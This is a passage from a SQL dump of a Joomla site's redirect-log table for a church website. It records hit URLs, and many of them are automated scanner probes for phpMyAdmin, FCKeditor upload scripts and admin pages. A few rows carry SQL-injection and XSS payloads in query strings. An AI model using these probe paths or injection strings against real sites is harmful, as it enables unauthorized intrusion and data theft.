(10105, 'https://142.4.21.132/phpmyadmin-2.2.6/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:22', '0000-00-00 00:00:00', 301),
(10106, 'https://142.4.21.132/phpmyadmin-2.5.1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:23', '0000-00-00 00:00:00', 301),
(10107, 'https://142.4.21.132/phpmyadmin-2.5.4/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:24', '0000-00-00 00:00:00', 301),
(10108, 'https://142.4.21.132/phpmyadmin-2.5.5-rc2/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:24', '0000-00-00 00:00:00', 301),
(10109, 'https://142.4.21.132/phpmyadmin-2.5.5/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:26', '0000-00-00 00:00:00', 301),
(10110, 'https://142.4.21.132/phpmyadmin-2.5.5-pl1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:27', '0000-00-00 00:00:00', 301),
(10111, 'https://142.4.21.132/phpmyadmin-2.5.6-rc1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:28', '0000-00-00 00:00:00', 301),
(10112, 'https://142.4.21.132/phpmyadmin-2.5.6-rc2/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:28', '0000-00-00 00:00:00', 301),
(10113, 'https://142.4.21.132/phpmyadmin-2.5.6/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:29', '0000-00-00 00:00:00', 301),
(10114, 'https://142.4.21.132/phpmyadmin-2.5.7/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:29', '0000-00-00 00:00:00', 301),
(10115, 'https://142.4.21.132/phpmyadmin-2.5.7-pl1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:30', '0000-00-00 00:00:00', 301),
(10116, 'https://142.4.21.132/phpmyadmin-2.6.0-alpha/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:31', '0000-00-00 00:00:00', 301),
(10117, 'https://142.4.21.132/phpmyadmin-2.6.0-alpha2/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:31', '0000-00-00 00:00:00', 301),
(10118, 'https://142.4.21.132/phpmyadmin-2.6.0-beta1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:32', '0000-00-00 00:00:00', 301),
(10119, 'https://142.4.21.132/phpmyadmin-2.6.0-beta2/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:33', '0000-00-00 00:00:00', 301),
(10120, 'https://142.4.21.132/phpmyadmin-2.6.0-rc1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:33', '0000-00-00 00:00:00', 301),
(10121, 'https://142.4.21.132/phpmyadmin-2.6.0-rc2/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:34', '0000-00-00 00:00:00', 301),
(10122, 'https://142.4.21.132/phpmyadmin-2.6.0-rc3/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:34', '0000-00-00 00:00:00', 301),
(10123, 'https://142.4.21.132/phpmyadmin-2.6.0/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:35', '0000-00-00 00:00:00', 301),
(10124, 'https://142.4.21.132/phpmyadmin-2.6.0-pl2/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:36', '0000-00-00 00:00:00', 301),
(10125, 'https://142.4.21.132/phpmyadmin-2.6.0-pl3/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:36', '0000-00-00 00:00:00', 301),
(10126, 'https://142.4.21.132/phpmyadmin-2.6.1-rc1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:37', '0000-00-00 00:00:00', 301),
(10127, 'https://142.4.21.132/phpmyadmin-2.6.1-rc2/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:38', '0000-00-00 00:00:00', 301),
(10128, 'https://142.4.21.132/phpmyadmin-2.6.1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:38', '0000-00-00 00:00:00', 301),
(10129, 'https://142.4.21.132/phpmyadmin-2.6.1-pl1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:39', '0000-00-00 00:00:00', 301),
(10130, 'https://142.4.21.132/phpmyadmin-2.6.1-pl2/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:40', '0000-00-00 00:00:00', 301),
(10131, 'https://142.4.21.132/phpmyadmin-2.6.1-pl3/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:40', '0000-00-00 00:00:00', 301),
(10132, 'https://142.4.21.132/phpmyadmin-2.6.2-rc1/', NULL, 'https://142.4.21.132/', '', 2, 0, '2019-01-08 14:36:41', '0000-00-00 00:00:00', 301),
(10133, 'https://142.4.21.132/phpmyadmin-2.6.2-beta1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:41', '0000-00-00 00:00:00', 301),
(10134, 'https://142.4.21.132/phpmyadmin-2.6.2/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:43', '0000-00-00 00:00:00', 301),
(10135, 'https://142.4.21.132/phpmyadmin-2.6.2-pl1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:43', '0000-00-00 00:00:00', 301),
(10136, 'https://142.4.21.132/phpmyadmin-2.6.3/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:44', '0000-00-00 00:00:00', 301),
(10137, 'https://142.4.21.132/phpmyadmin-2.6.3-rc1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:45', '0000-00-00 00:00:00', 301),
(10138, 'https://142.4.21.132/phpmyadmin-2.6.3-pl1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:45', '0000-00-00 00:00:00', 301),
(10139, 'https://142.4.21.132/phpmyadmin-2.6.4-rc1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:46', '0000-00-00 00:00:00', 301),
(10140, 'https://142.4.21.132/phpmyadmin-2.6.4-pl1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:46', '0000-00-00 00:00:00', 301),
(10141, 'https://142.4.21.132/phpmyadmin-2.6.4-pl2/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:47', '0000-00-00 00:00:00', 301),
(10142, 'https://142.4.21.132/phpmyadmin-2.6.4-pl3/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:48', '0000-00-00 00:00:00', 301),
(10143, 'https://142.4.21.132/phpmyadmin-2.6.4-pl4/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:48', '0000-00-00 00:00:00', 301),
(10144, 'https://142.4.21.132/phpmyadmin-2.6.4/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:49', '0000-00-00 00:00:00', 301),
(10145, 'https://142.4.21.132/phpmyadmin-2.7.0-beta1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:49', '0000-00-00 00:00:00', 301),
(10146, 'https://142.4.21.132/phpmyadmin-2.7.0-rc1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:50', '0000-00-00 00:00:00', 301),
(10147, 'https://142.4.21.132/phpmyadmin-2.7.0-pl1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:52', '0000-00-00 00:00:00', 301),
(10148, 'https://142.4.21.132/phpmyadmin-2.7.0-pl2/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:52', '0000-00-00 00:00:00', 301),
(10149, 'https://142.4.21.132/phpmyadmin-2.7.0/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:53', '0000-00-00 00:00:00', 301),
(10150, 'https://142.4.21.132/phpmyadmin-2.8.0-beta1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:53', '0000-00-00 00:00:00', 301),
(10151, 'https://142.4.21.132/phpmyadmin-2.8.0-rc1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:54', '0000-00-00 00:00:00', 301),
(10152, 'https://142.4.21.132/phpmyadmin-2.8.0-rc2/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:55', '0000-00-00 00:00:00', 301),
(10153, 'https://142.4.21.132/phpmyadmin-2.8.0/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:55', '0000-00-00 00:00:00', 301),
(10154, 'https://142.4.21.132/phpmyadmin-2.8.0.1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:56', '0000-00-00 00:00:00', 301),
(10155, 'https://142.4.21.132/phpmyadmin-2.8.0.2/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:56', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(10156, 'https://142.4.21.132/phpmyadmin-2.8.0.3/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:57', '0000-00-00 00:00:00', 301),
(10157, 'https://142.4.21.132/phpmyadmin-2.8.0.4/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:58', '0000-00-00 00:00:00', 301),
(10158, 'https://142.4.21.132/phpmyadmin-2.8.1-rc1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:58', '0000-00-00 00:00:00', 301),
(10159, 'https://142.4.21.132/phpmyadmin-2.8.1/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:59', '0000-00-00 00:00:00', 301),
(10160, 'https://142.4.21.132/phpmyadmin-2.8.2/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:36:59', '0000-00-00 00:00:00', 301),
(10161, 'https://142.4.21.132/sqlmanager/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:37:00', '0000-00-00 00:00:00', 301),
(10162, 'https://142.4.21.132/mysqlmanager/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:37:01', '0000-00-00 00:00:00', 301),
(10163, 'https://142.4.21.132/p/m/a/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:37:01', '0000-00-00 00:00:00', 301),
(10164, 'https://142.4.21.132/pma2005/', NULL, 'https://142.4.21.132/', '', 2, 0, '2019-01-08 14:37:02', '0000-00-00 00:00:00', 301),
(10165, 'https://142.4.21.132/phpmanager/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:37:03', '0000-00-00 00:00:00', 301),
(10166, 'https://142.4.21.132/php-myadmin/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:37:04', '0000-00-00 00:00:00', 301),
(10167, 'https://142.4.21.132/phpmy-admin/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:37:04', '0000-00-00 00:00:00', 301),
(10168, 'https://142.4.21.132/webadmin/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:37:05', '0000-00-00 00:00:00', 301),
(10169, 'https://142.4.21.132/sqlweb/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:37:05', '0000-00-00 00:00:00', 301),
(10170, 'https://142.4.21.132/websql/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:37:06', '0000-00-00 00:00:00', 301),
(10171, 'https://142.4.21.132/webdb/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:37:07', '0000-00-00 00:00:00', 301),
(10172, 'https://142.4.21.132/mysqladmin/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:37:07', '0000-00-00 00:00:00', 301),
(10173, 'https://142.4.21.132/mysql-admin/', NULL, 'https://142.4.21.132/', '', 1, 0, '2019-01-08 14:37:08', '0000-00-00 00:00:00', 301),
(10174, 'https://www.lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/54-slide-04', NULL, '', '', 2, 0, '2019-01-09 05:15:17', '0000-00-00 00:00:00', 301),
(10175, 'https://lifeoasisinternationalchurch.org/privatrstreaming', NULL, '', '', 1, 0, '2019-01-11 22:18:51', '0000-00-00 00:00:00', 301),
(10176, 'https://www.lifeoasisinternationalchurch.org/private/youtube', NULL, '', '', 1, 0, '2019-01-12 09:57:45', '0000-00-00 00:00:00', 301),
(10177, 'https://mobile.12306.cn/otsmobile/app/mgs/mgw.htm?operationtype=com.cars.otsmobile.queryleftticketz&requestdata=[{\"train_date\":\"20190118\",\"purpose_codes\":\"00\",\"from_station\":\"shh\",\"to_station\":\"cnw\",\"station_train_code\":\"\",\"start_time_begin\":\"0000\",\"start_time_end\":\"2400\",\"train_headers\":\"qb#\",\"train_flag\":\"\",\"seat_type\":\"\",\"seatback_type\":\"\",\"ticket_num\":\"\",\"dfpstr\":\"\",\"basedto\":{\"check_code\":\"308d8f4d2bffbbd211752a49545c0380\",\"device_no\":\"7b9983203ff3322d72ea962859c35d9b\",\"mobile_no\":\"\",\"os_type\":\"a\",\"time_str\":\"20190113152948\",\"user_name\":\"\",\"version_no\":\"4.1.9\"}}]&ts=1547364588123&sign=', NULL, '', '', 1, 0, '2019-01-13 07:29:46', '0000-00-00 00:00:00', 301),
(10178, 'https://142.4.21.132/index.php?option=com_jpprojects&view=projects&tmpl=component&format=json', NULL, '', '', 2, 0, '2019-01-16 00:17:25', '0000-00-00 00:00:00', 301),
(10179, 'https://142.4.21.132/nmaplowercheck1547638084', NULL, '', '', 1, 0, '2019-01-16 11:28:07', '0000-00-00 00:00:00', 301),
(10180, 'https://www.lifeoasisinternationalchurch.org/syreaming', NULL, '', '', 4, 0, '2019-01-16 16:01:39', '0000-00-00 00:00:00', 301),
(10181, 'https://lifeoasisinternationalchurch.org/live stream', NULL, '', '', 1, 0, '2019-01-16 16:40:09', '0000-00-00 00:00:00', 301),
(10182, 'https://lifeoasisinternationalchurch.org/streamig', NULL, '', '', 2, 0, '2019-01-16 17:06:52', '0000-00-00 00:00:00', 301),
(10183, 'https://www.lifeoasisinternationalchurch.org/resources/\' + $href + \'', NULL, '', '', 1, 0, '2019-01-18 18:03:25', '0000-00-00 00:00:00', 301),
(10184, 'https://142.4.21.132/nmaplowercheck1547878241', NULL, '', '', 1, 0, '2019-01-19 06:10:39', '0000-00-00 00:00:00', 301),
(10185, 'https://lifeoasisinternationalchurch.org/adminer-4.6.3.php', NULL, '', '', 1, 0, '2019-01-19 20:12:38', '0000-00-00 00:00:00', 301),
(10186, 'https://lifeoasisinternationalchurch.org/streamimg/', NULL, '', '', 1, 0, '2019-01-20 11:24:20', '0000-00-00 00:00:00', 301),
(10187, 'https://lifeoasisinternationalchurch.org/webstat/', NULL, '', '', 1, 0, '2019-01-21 04:03:05', '0000-00-00 00:00:00', 301),
(10188, 'https://lifeoasisinternationalchurch.org/ streamed', NULL, '', '', 1, 0, '2019-01-21 16:58:18', '0000-00-00 00:00:00', 301),
(10189, 'https://lifeoasisinternationalchurch.org/fckeditor/editor/filemanager/upload/php/upload.php', NULL, '', '', 2, 0, '2019-01-23 08:55:33', '0000-00-00 00:00:00', 301),
(10190, 'https://lifeoasisinternationalchurch.org/streaming)', NULL, '', '', 2, 0, '2019-01-23 12:03:58', '0000-00-00 00:00:00', 301),
(10191, 'https://www.lifeoasisinternationalchurch.org/resources/lie-streaming', NULL, '', '', 1, 0, '2019-01-23 19:26:08', '0000-00-00 00:00:00', 301),
(10192, 'https://lifeoasisinternationalchurch.org/js/fckeditor/editor/filemanager/upload/php/upload.php', NULL, '', '', 1, 0, '2019-01-23 23:16:53', '0000-00-00 00:00:00', 301),
(10193, 'https://lifeoasisinternationalchurch.org/editor/editor/filemanager/upload/php/upload.php', NULL, '', '', 1, 0, '2019-01-24 00:05:30', '0000-00-00 00:00:00', 301),
(10194, 'https://lifeoasisinternationalchurch.org/editor/filemanager/upload/php/upload.php', NULL, '', '', 1, 0, '2019-01-24 00:57:06', '0000-00-00 00:00:00', 301),
(10195, 'https://lifeoasisinternationalchurch.org/core/fckeditor/editor/filemanager/upload/php/upload.php', NULL, '', '', 1, 0, '2019-01-24 01:59:56', '0000-00-00 00:00:00', 301),
(10196, 'https://lifeoasisinternationalchurch.org/scripts/fckeditor/editor/filemanager/upload/php/upload.php', NULL, '', '', 1, 0, '2019-01-24 04:47:23', '0000-00-00 00:00:00', 301),
(10197, 'https://lifeoasisinternationalchurch.org/javascripts/fckeditor/editor/filemanager/upload/php/upload.php', NULL, '', '', 1, 0, '2019-01-24 05:38:00', '0000-00-00 00:00:00', 301),
(10198, 'https://lifeoasisinternationalchurch.org/mambots/editors/fckeditor/editor/filemanager/upload/php/upload.php', NULL, '', '', 2, 0, '2019-01-24 06:30:17', '0000-00-00 00:00:00', 301),
(10199, 'https://lifeoasisinternationalchurch.org/filemanager/upload/php/upload.php', NULL, '', '', 1, 0, '2019-01-24 08:09:13', '0000-00-00 00:00:00', 301),
(10200, 'https://lifeoasisinternationalchurch.org/editor/filemanager/browser/default/connectors/php/connector.php?command=getfoldersandfiles&type=file&currentfolder=/', NULL, '', '', 1, 0, '2019-01-24 08:53:15', '0000-00-00 00:00:00', 301),
(10201, 'https://lifeoasisinternationalchurch.org/mambots/editors/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?command=getfoldersandfiles&type=file&currentfolder=/', NULL, '', '', 2, 0, '2019-01-25 06:55:29', '0000-00-00 00:00:00', 301),
(10202, 'https://lifeoasisinternationalchurch.org/fckeditor/editor/filemanager/connectors/php/upload.php', NULL, '', '', 4, 0, '2019-01-26 06:26:09', '0000-00-00 00:00:00', 301),
(10203, 'https://lifeoasisinternationalchurch.org/wp_login', NULL, '', '', 1, 0, '2019-01-27 10:07:28', '0000-00-00 00:00:00', 301),
(10204, 'https://lifeoasisinternationalchurch.org/wp-login', NULL, '', '', 1, 0, '2019-01-27 10:07:43', '0000-00-00 00:00:00', 301),
(10205, 'https://lifeoasisinternationalchurch.org/liferesources/live-streaming', NULL, '', '', 3, 0, '2019-01-27 10:31:15', '0000-00-00 00:00:00', 301),
(10206, 'https://142.4.21.132/index.php?option=com_lexikon&id=-1 union select 1,md5(3.1415),3--+', NULL, 'http://www.baidu.com', '', 6, 0, '2019-01-28 10:37:06', '0000-00-00 00:00:00', 301),
(10207, 'https://142.4.21.132/index.php?option=com_googlesearch_cse&n=30&itemid=97&q=\"><img+src=x+onerror=alert(/<0x!!qaz_*/)>', NULL, 'http://www.baidu.com', '', 7, 0, '2019-01-28 13:03:10', '0000-00-00 00:00:00', 301),
(10208, 'https://142.4.21.132/index.php?option=com_formmaker&view=formmaker&id=1 union all select null,null,null,null,null,concat(0x7165696a71,ifnull(cast(md5(3.1415) as char),0x20),0x7175647871),null,null,null,null,null,null,null#', NULL, 'http://www.baidu.com', '', 29, 0, '2019-01-29 05:25:50', '0000-00-00 00:00:00', 301),
(10209, 'https://lifeoasisinternationalchurch.org/osogbolive-streaming', NULL, '', '', 1, 0, '2019-01-30 18:20:34', '0000-00-00 00:00:00', 301),
(10210, 'https://lifeoasisinternationalchurch.org/administration.php', NULL, '', '', 1, 0, '2019-01-31 13:10:23', '0000-00-00 00:00:00', 301),
(10211, 'https://www.lifeoasisinternationalchurch.org/rsources/live-streaming', NULL, '', '', 2, 0, '2019-02-01 09:51:30', '0000-00-00 00:00:00', 301),
(10212, 'https://lifeoasisinternationalchurch.org/oihfoe09fposf.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2019-02-02 07:32:19', '0000-00-00 00:00:00', 301),
(10213, 'https://lifeoasisinternationalchurch.org/livestreamingradio', NULL, '', '', 1, 0, '2019-02-02 08:32:54', '0000-00-00 00:00:00', 301),
(10214, 'https://www.lifeoasisinternationalchurch.org/,streamin', NULL, '', '', 2, 0, '2019-02-02 11:36:56', '0000-00-00 00:00:00', 301),
(10215, 'https://142.4.21.132/consolidacion/archivosporpublicacion', NULL, '', '', 1, 0, '2019-02-02 19:52:37', '0000-00-00 00:00:00', 301),
(10216, 'https://lifeoasisinternationalchurch.org/.well-known/dat', NULL, '', '', 1, 0, '2019-02-03 19:55:35', '0000-00-00 00:00:00', 301),
(10217, 'https://www.lifeoasisinternationalchurch.org/.well-known/dat', NULL, '', '', 1, 0, '2019-02-03 19:55:37', '0000-00-00 00:00:00', 301),
(10218, 'https://lifeoasisinternationalchurch.org/jwlsjd_baaqifg.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2019-02-04 15:39:41', '0000-00-00 00:00:00', 301),
(10219, 'https://www.lifeoasisinternationalchurch.org/backup/', NULL, '', '', 9, 0, '2019-02-05 05:04:23', '0000-00-00 00:00:00', 301),
(10220, 'https://www.lifeoasisinternationalchurch.org/backups/', NULL, '', '', 1, 0, '2019-02-05 05:04:27', '0000-00-00 00:00:00', 301),
(10221, 'https://www.lifeoasisinternationalchurch.org/bitcoin/', NULL, '', '', 1, 0, '2019-02-05 05:04:30', '0000-00-00 00:00:00', 301),
(10222, 'https://lifeoasisinternationalchurch.org/members', NULL, '', '', 1, 0, '2019-02-06 18:49:16', '0000-00-00 00:00:00', 301),
(10223, 'https://www.lifeoasisinternationalchurch.org/livestreaming/private', NULL, '', '', 3, 0, '2019-02-06 18:59:22', '0000-00-00 00:00:00', 301),
(10224, 'https://www.lifeoasisinternationalchurch.org/perivate', NULL, '', '', 1, 0, '2019-02-06 19:51:01', '0000-00-00 00:00:00', 301),
(10225, 'https://lifeoasisinternationalchurch.org/rss/catalog/notifystock/', NULL, 'http://lifeoasisinternationalchurch.org/rss/catalog/notifystock/', '', 2, 0, '2019-02-08 07:36:38', '0000-00-00 00:00:00', 301),
(10226, 'https://lifeoasisinternationalchurch.org/config', NULL, '', '', 2, 0, '2019-02-08 12:14:24', '0000-00-00 00:00:00', 301),
(10227, 'https://lifeoasisinternationalchurch.org/configuration-backup', NULL, '', '', 1, 0, '2019-02-08 12:15:00', '0000-00-00 00:00:00', 301),
(10228, 'https://lifeoasisinternationalchurch.org/configuration ', NULL, '', '', 1, 0, '2019-02-08 12:16:14', '0000-00-00 00:00:00', 301),
(10229, 'https://lifeoasisinternationalchurch.org/private_streaming', NULL, '', '', 1, 0, '2019-02-08 22:41:18', '0000-00-00 00:00:00', 301),
(10230, 'https://142.4.21.132/vtigercrm/vtigerservice.php', NULL, '', '', 6, 0, '2019-02-08 23:17:32', '0000-00-00 00:00:00', 301),
(10231, 'https://www.lifeoasisinternationalchurch.org/privare', NULL, '', '', 1, 0, '2019-02-09 00:48:35', '0000-00-00 00:00:00', 301),
(10232, 'https://www.lifeoasisinternationalchurch.org/private/periscope', NULL, '', '', 1, 0, '2019-02-09 09:30:36', '0000-00-00 00:00:00', 301),
(10233, 'https://www.lifeoasisinternationalchurch.org/dtreaming.org/streaming', NULL, '', '', 1, 0, '2019-02-09 09:54:06', '0000-00-00 00:00:00', 301),
(10234, 'https://lifeoasisinternationalchurch.org/private dod', NULL, '', '', 1, 0, '2019-02-10 12:07:56', '0000-00-00 00:00:00', 301),
(10235, 'https://www.lifeoasisinternationalchurch.org/resources/live-streamingprivate', NULL, '', '', 1, 0, '2019-02-11 22:15:21', '0000-00-00 00:00:00', 301),
(10236, 'https://lifeoasisinternationalchurch.org/resources/live-streaming/pri', NULL, '', '', 1, 0, '2019-02-12 01:02:17', '0000-00-00 00:00:00', 301),
(10237, 'https://www.lifeoasisinternationalchurch.org/resources/lprivate', NULL, '', '', 2, 0, '2019-02-12 01:10:02', '0000-00-00 00:00:00', 301),
(10238, 'https://lifeoasisinternationalchurch.org/index.php/wp-json/wp/v2/posts/?order=asc&per_page=1&offset=0', NULL, '', '', 1, 0, '2019-02-12 15:17:47', '0000-00-00 00:00:00', 301),
(10239, 'https://lifeoasisinternationalchurch.org/horde/imp/test.php', NULL, '', '', 2, 0, '2019-02-12 22:49:54', '0000-00-00 00:00:00', 301),
(10240, 'https://lifeoasisinternationalchurch.org/horde3/imp/test.php', NULL, '', '', 2, 0, '2019-02-12 22:50:00', '0000-00-00 00:00:00', 301),
(10241, 'https://lifeoasisinternationalchurch.org/imp/test.php', NULL, '', '', 2, 0, '2019-02-12 22:50:05', '0000-00-00 00:00:00', 301),
(10242, 'https://142.4.21.132/api/v1', NULL, '', '', 7, 0, '2019-02-13 07:24:39', '0000-00-00 00:00:00', 301),
(10243, 'https://lifeoasisinternationalchurch.org/tmaumqgr8sb3/tbsoicdie20yfq7/axjktpjxdkdjnocy0ab9', NULL, '', '', 1, 0, '2019-02-13 16:19:53', '0000-00-00 00:00:00', 301),
(10244, 'https://lifeoasisinternationalchurch.org/anwc2019/wp-admin', NULL, '', '', 1, 0, '2019-02-13 19:37:05', '0000-00-00 00:00:00', 301),
(10245, 'https://lifeoasisinternationalchurch.org/anwc', NULL, '', '', 1, 0, '2019-02-13 19:37:15', '0000-00-00 00:00:00', 301),
(10246, 'https://mobile.12306.cn/otsmobile/app/mgs/mgw.htm?operationtype=com.cars.otsmobile.queryleftticketz&requestdata=[{\"train_date\":\"20190220\",\"purpose_codes\":\"00\",\"from_station\":\"shh\",\"to_station\":\"cnw\",\"station_train_code\":\"\",\"start_time_begin\":\"0000\",\"start_time_end\":\"2400\",\"train_headers\":\"qb#\",\"train_flag\":\"\",\"seat_type\":\"\",\"seatback_type\":\"\",\"ticket_num\":\"\",\"dfpstr\":\"\",\"basedto\":{\"check_code\":\"53794522afad52e2240d0f54abda8d9b\",\"device_no\":\"9fddb6faad5e3a32363efe2fe423f47b\",\"mobile_no\":\"\",\"os_type\":\"a\",\"time_str\":\"20190215193205\",\"user_name\":\"\",\"version_no\":\"4.1.9\"}}]&ts=1550230325836&sign=', NULL, '', '', 1, 0, '2019-02-15 11:32:05', '0000-00-00 00:00:00', 301),
(10247, 'https://mobile.12306.cn/otsmobile/app/mgs/mgw.htm?operationtype=com.cars.otsmobile.queryleftticketz&requestdata=[{\"train_date\":\"20190220\",\"purpose_codes\":\"00\",\"from_station\":\"shh\",\"to_station\":\"cnw\",\"station_train_code\":\"\",\"start_time_begin\":\"0000\",\"start_time_end\":\"2400\",\"train_headers\":\"qb#\",\"train_flag\":\"\",\"seat_type\":\"\",\"seatback_type\":\"\",\"ticket_num\":\"\",\"dfpstr\":\"\",\"basedto\":{\"check_code\":\"46f3f2c91a5299a2aa65714a4888c187\",\"device_no\":\"9e1efbe939387abb7ed09036a7de660f\",\"mobile_no\":\"\",\"os_type\":\"a\",\"time_str\":\"20190215214817\",\"user_name\":\"\",\"version_no\":\"4.1.9\"}}]&ts=1550238497544&sign=', NULL, '', '', 1, 0, '2019-02-15 13:48:16', '0000-00-00 00:00:00', 301),
(10248, 'https://142.4.21.132/nmaplowercheck1550269389', NULL, '', '', 1, 0, '2019-02-15 22:23:08', '0000-00-00 00:00:00', 301),
(10249, 'https://lifeoasisinternationalchurch.org/resources/privatelive-streaming', NULL, '', '', 1, 0, '2019-02-17 10:37:04', '0000-00-00 00:00:00', 301),
(10250, 'https://lifeoasisinternationalchurch.org/tining', NULL, '', '', 1, 0, '2019-02-17 12:31:51', '0000-00-00 00:00:00', 301),
(10251, 'https://142.4.21.132/jzhp', NULL, '', '', 1, 0, '2019-02-18 21:39:35', '0000-00-00 00:00:00', 301),
(10252, 'https://142.4.21.132/server-status', NULL, 'http://www.baidu.com', '', 20, 0, '2019-02-19 03:50:04', '0000-00-00 00:00:00', 301),
(10253, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/measures/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:02:49', '0000-00-00 00:00:00', 301),
(10254, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/measures/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:02:49', '0000-00-00 00:00:00', 301),
(10255, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/salvation/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:02:55', '0000-00-00 00:00:00', 301),
(10256, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy spirit/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:03:04', '0000-00-00 00:00:00', 301),
(10257, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy spirit/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:03:04', '0000-00-00 00:00:00', 301),
(10258, 'https://lifeoasisinternationalchurch.org/resources/blog/item/55-divine-appointment/component/users/?view=reset&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:03:25', '0000-00-00 00:00:00', 301),
(10259, 'https://lifeoasisinternationalchurch.org/resources/blog/item/55-divine-appointment/component/users/?view=remind&itemid=101', NULL, '', '', 1, 0, '2019-02-19 16:03:25', '0000-00-00 00:00:00', 301),
(10260, 'https://lifeoasisinternationalchurch.org/divine-agenda/about-us/the-church', NULL, '', '', 1, 0, '2019-02-19 16:03:25', '0000-00-00 00:00:00', 301),
(10261, 'https://lifeoasisinternationalchurch.org/divine-agenda/about-us/service-times', NULL, '', '', 1, 0, '2019-02-19 16:03:26', '0000-00-00 00:00:00', 301),
